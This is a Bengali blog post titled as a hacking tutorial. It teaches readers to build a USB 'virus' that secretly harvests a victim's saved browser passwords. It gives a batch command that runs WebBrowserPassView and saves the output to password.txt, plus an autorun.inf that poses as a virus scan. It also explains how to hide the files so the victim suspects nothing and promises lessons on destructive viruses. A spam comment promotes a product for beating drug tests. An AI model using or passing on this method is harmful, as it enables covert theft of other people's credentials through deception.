নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial

কম্পিউটার ফোল্ডার তৈরী করুন,ছবি দিয়ে কম্পিউটার ফোল্ডার তৈরী করুন,ইমু ভাইরাস আইডি,ডিলিট করুন কম্পিউটারের সব ভাইরাস।,যে কোন ছবি দিয়ে কম্পিউটার ফোল্ডার ত

Hello dear visitors welcome to our website - MR Laboratory. Today we will finish this article by discussing about নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial. Search on Google or visit mrlaboratory.info to know more about নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial article. See the table of contents to get an idea of the main topic of the article.

নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। 


আসসালামু আলাইকুম!! আজকের পোস্টে  দেখাবো খুব সিম্পল একটা ট্রিক। আপনার নিশ্চয় মাঝে মাঝে মনে হয় যদি হলিউড হ্যাকিং মুভির মতো জাস্ট পেনড্রাইভ অন্যের কম্পিউটারে ঢুকাবো আর বের করে ফেলবো তাহলেই সব হ্যাক হয়ে যাবে! হ্যাঁ, সেটাই আজ দেখাবো এবং এই ধরণের হ্যাকিং থেকে বাঁচার উপায়ও বলে দেব ইনশাল্লাহ! কিন্তু এই কাজটি আপনারা কখনোই মানুষের ক্ষতি করার জন্য ব্যবহার করবেননা। আর এই ধরণের আরো পোস্ট যদি এই গ্রুপে পেতে চান, তাহলে আপনাদের অবশ্যই এই পোস্টে লাইক করতে হবে এবং কমেন্ট করতে হবে। তাহলে এরকম আরো অনেক পোস্ট আপনারা পাবেন। আচ্ছা, কথা অনেক হয়েছে এখন কি কি লাগবে সেটা বলে দিচ্ছি।

Windows Computer [ XP or Vista or 7 or 8 or 10] PendriveWeb Browser Pass View Software [ Just 226 Kilobyte]

নিচের দেয়া লিংক থেকে সফটওয়্যার টি ডাউনলোড করে নিনঃ- Download from here:- www.filehorse.com/download–webbrowserpassview অথবা,
Download from here:- www.download.hr/download–webbrowserpassview.html

উপরের দেয়া দুইটা লিংক এর যেকোন একটা থেকে ডাউনলোড করে নিন। সাইজ মাত্র 226 Kilobyte.

আচ্ছা, এখন আমরা তৈরি এই পেন ড্রাইভ ভাইরাস তৈরি করার জন্য।

নিচের কাজ গুলো স্টেপ বাই স্টেপ ফলো করুন।

স্টেপ-১:- ডাউনলোড করা ফাইল এক্সট্রাক্ট করুন। এখন, ভেতরে দেখবেন তিনটি ফাইল আছে। কোন কিছুতে ভুলেও ক্লিক করবেন না।

স্টেপ-২:- একটা ফোল্ডার তৈরি করুন নাম দিবেন “data”। এবং এক্সট্রাক্ট করে পাওয়া ওই তিনটা ফাইল কপি করে এই data ফোল্ডারে রাখুন।

স্টেপ-৩:- আপনার পেন ড্রাইভ কম্পিউটারে প্রবেশ করান (পেন ড্রাইভ যেন ফাকা থাকে)। এবং ওই “data” ফোল্ডার কপি করে পেন ড্রাইভ রেখে দিন।

স্টেপ-৪:- এবার নোটপ্যাড ওপেন করে নিচের কোডটুকু কপি করে drive নামের এবং .bat ফাইল হিসেবে সেভ করুন।
start data\WebBrowserPassView.exe \stext password.txt

স্টেপ-৫:- আবার আগের মতো নোটপ্যাড ওপেন করে নিচের কোডটুকু কপি করে পেস্ট করে দেন। এই ফাইলটার নাম দিবেন Autorun এবং .inf হিসেবে সেভ করবেন। আগের মতোই শুধু .bat এর জায়গায় .inf দিলেই সেভ হবে।
[autorun] open=drive.bat Action=Perform a Virus Scan

এখন এই দুইটা ফাইল (drive.bat এবং autorun.inf) কপি করে পেন্ড্রাইভে রাখুন।

এখন তাহলে আপনার পেন্ড্রাইভে মোট তিনটি জিনিস আছে। data ফোল্ডার, drive.bat এবং autorun.inf এবং ওই Data ফোল্ডারের ভেতর আছে এক্সট্রাক্ট করা তিনটা ফাইল।

স্টেপ-৬:- আমাদের অস্ত্র তৈরি। এখন শুধু হ্যাক করার পালা। এখন পেন্ড্রাইভ টা আপনার ভিক্টিমের কম্পিউটারে ঢোকাবেন এবং ওই drive.bat ফাইলটাতে জাস্ট দুইটা ক্লিক করবেন। কিছুক্ষণ পরে পেন্ড্রাইভ খুলে নিয়ে আপনার পিসিতে লাগান এবং Data ফোল্ডারের ভেতর যেই “password.txt” আছে এইটা ওপেন করুন আর দেখুন মজা! ভিক্টিমের কম্পিউটারের সবকিছু আপনার পেনড্রাইভে সেভ হয়ে চলে এসেছে।

নিচে যাওয়ার আগে একবার নিজে করে টেস্ট করুন!

একটু ওয়েট করেন যদি আপনার ভিক্টিম দেখে পেন ড্রাইভে তার সব ফাইল আছে তাহলে তো সে সন্দেহ করবে। এখন কি করা যায়?? আমরা ফাইল তিনটা হাইড করবো। Windows 7 এবং Xp তে হাইড করার জন্য গুগলে লিখুন “How to hide selected item in windows 7″। উপায় পেয়ে যাবেন। আমি অনেকদিন Windows 7 ব্যবহার করি না Windows 8 এবং 10 এ হাইড করার জন্য নিচের কাজ করুন। Select All files —> এখন সেলেক্ট করার পরে দেখবেন উপরের টুলবারে View নামের একটা ট্যাব আছে ওখানে ক্লিক করুন। তারপর দেখতে পারবেন ডান দিকে আছে Hide Selected Items। এটাতে ক্লিক করুন। ব্যাস!! এখন মনে হচ্ছে পেন ড্রাইভ আর কিছু নেই। তাহলে, এখন পেন ড্রাইভ এখন বের করুন।

কিভাবে হ্যাক হবে? এবার আপনার পেন্ড্রাইভ যখনই কারোর কম্পিউটারে প্রবেশ করাবেন সাথে সাথে বলবে যে There is a probelm with this drive. Scan the drive now and fix it.তখন আপনি বা ভিকটিম তখন ওখানে ক্লিক করবে, তাহলে পেন্ড্রাইভ সাধারনভাবে স্ক্যান হবে এবং আমাদের কাজও শুরু হয়ে যাবে। অল্প কিছুক্ষণ পরে পেন ড্রাইভ বের করে নিজের কম্পিউটারে নিবেন এবং ওই Data ফোল্ডারের ভেতর যে password.txt আছে ওটা ওপেন করবেন দেখবেন ভেতরে কি আছে!!!

কিন্তু, আপনি এই ধরণের হ্যাকিং থেকে বাঁচবেন কিভাবে? খুব সহজ। ব্রাউজারে পাসওয়ার্ড সেভ করবেন সাধারণত। আর যদিও সেভ করেন তাহলে সেটিং থেকে আগে মাস্টার পাসওয়ার্ড দিয়ে রাখবেন। কিভাবে দিবেন?গুগল করেন। আজকে অনেক হয়েছে। আপনাদের আশানুরূপ সাড়া পেলে ভাইরাস দিয়ে আরেকদিন অন্যকিছু ধবংস করার শিখাবো ইনশাল্লাহ!! সে পর্যন্ত ভালো থাকুন। আসসালামু আলাইকুম!!কম্পিউটার ফোল্ডার তৈরী করুন,ছবি দিয়ে কম্পিউটার ফোল্ডার তৈরী করুন,ইমু ভাইরাস আইডি,ডিলিট করুন কম্পিউটারের সব ভাইরাস।,যে কোন ছবি দিয়ে কম্পিউটার ফোল্ডার তৈরী করুন,এক ক্লিকে ডিলিট করুন কম্পিউটারের সব ভাইরাস।,কম্পিউটার ভাইরাস কি,ভাইরাস তৈরি করুন,কম্পিউটার ভাইরাস কিভাবে কাজ করে,কিভাবে কম্পিউটার ভাইরাস ডিলিট,ভাইরাস,কম্পিউটার,how to make imo vairas? কিভাবে ইমু ভাইরাস তৈরি করবেন,ফোল্ডার তৈরী করুন,ব্যবহার করুন কম্পিউটারের সব সুবিধা,শর্টকাট ভাইরাস রিমুভ করুন

You are indeed a valuable reader of mrlaboratory. Thank you very much for reading the article about নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial. Please let us know how you feel after reading this article. Read more:-

নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial, নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial, নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial, নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial, নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial, নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial, নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial, নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial, নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial, নিজেই তৈরী করুন এক ভয়ংকর ভাইরাস। - Hacking Tutorial
Next Post Previous Post
3 Comments

You cannot comment with a link / URL. If you need backlinks then you can Contact with us

  • mrlaboratory.info
    mrlaboratory.info October 26, 2019 at 7:17 AM

    ধন্যবাদ

  • mrlaboratory.info
    mrlaboratory.info October 26, 2019 at 7:19 AM

    ধন্যবাদ

  • Unow22
    Unow22 November 10, 2021 at 4:25 AM

    If you have ever used mouthwash before, you will be familiar with how to use Toxin Rid. Prepare your small bottle of Toxin Rid Rescue, excuse yourself for a few moments, and then walk to the nearest toilet. Take a sip of the liquid from the bottle and swish it around for 30 seconds before spitting it out.  Repeat this process 2-3 times more or until the bottle is empty. After that, toss the bottle away and take your drug test. For the next 30 minutes, the mouth should be clean of any drug metabolites. Only remember not to eat or drink anything before taking the test because this could affect your results. Tetrahydrocannabinol (THC) is a chemical produced by the glands of the marijuana plant. When you smoke marijuana, THC passes from the lungs into the bloodstream, where it is delivered to the brain and other organs. This chemical compound in cannabis causes your cerebral high by influencing parts of the brain that control movement, feelings, coordination, memory, reward, and judgment.…

Add Comment
comment url